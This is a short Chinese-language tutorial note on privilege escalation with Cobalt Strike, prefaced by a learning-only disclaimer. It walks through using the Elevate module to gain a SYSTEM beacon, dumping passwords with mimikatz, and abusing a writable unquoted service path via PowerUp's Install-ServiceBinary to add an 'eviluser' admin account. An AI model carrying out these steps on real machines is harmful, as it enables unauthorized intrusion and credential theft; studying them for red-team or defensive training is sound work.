Cobalt Strike 之:提权
郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
Cobalt Strike 之:提权
1 利用 Cobalt Strike 提权模块提权
-
获取 beacon 会话
-
右键当前 beacon 会话选择 Access:Elevate 模块
-
右键带*号的 beacon 会话选择 Access:Elevate 模块
-
获取了具有 SYSTEM 权限的 beacon 会话
-
尝试运行 mimikatz 获取当前系统下的明文密码
当前密码为空:
2 Cobalt Strike 与 PowerShell 模块提权
# 1.导入 PowerShell 模块
powershell-import
回车后选择 PowerUp.ps1
# 2.查看“unquoted service paths”可以注入的程序或服务
powershell Invoke-AllChecks
# 3.确认可注入的程序或服务是否具有 user:F 的权限(F完全控制)
powershell icacls "C:\Program Files (x86)\2345Soft\2345Explorer\Protect\Protect_2345Explorer.exe"
# 利用具有完全控制权限的,又可注入的程序或服务添加高权限的账号与密码
powershell Install-ServiceBinary -ServiceName Protect_2345Explorer -UserName eviluser -Password 123456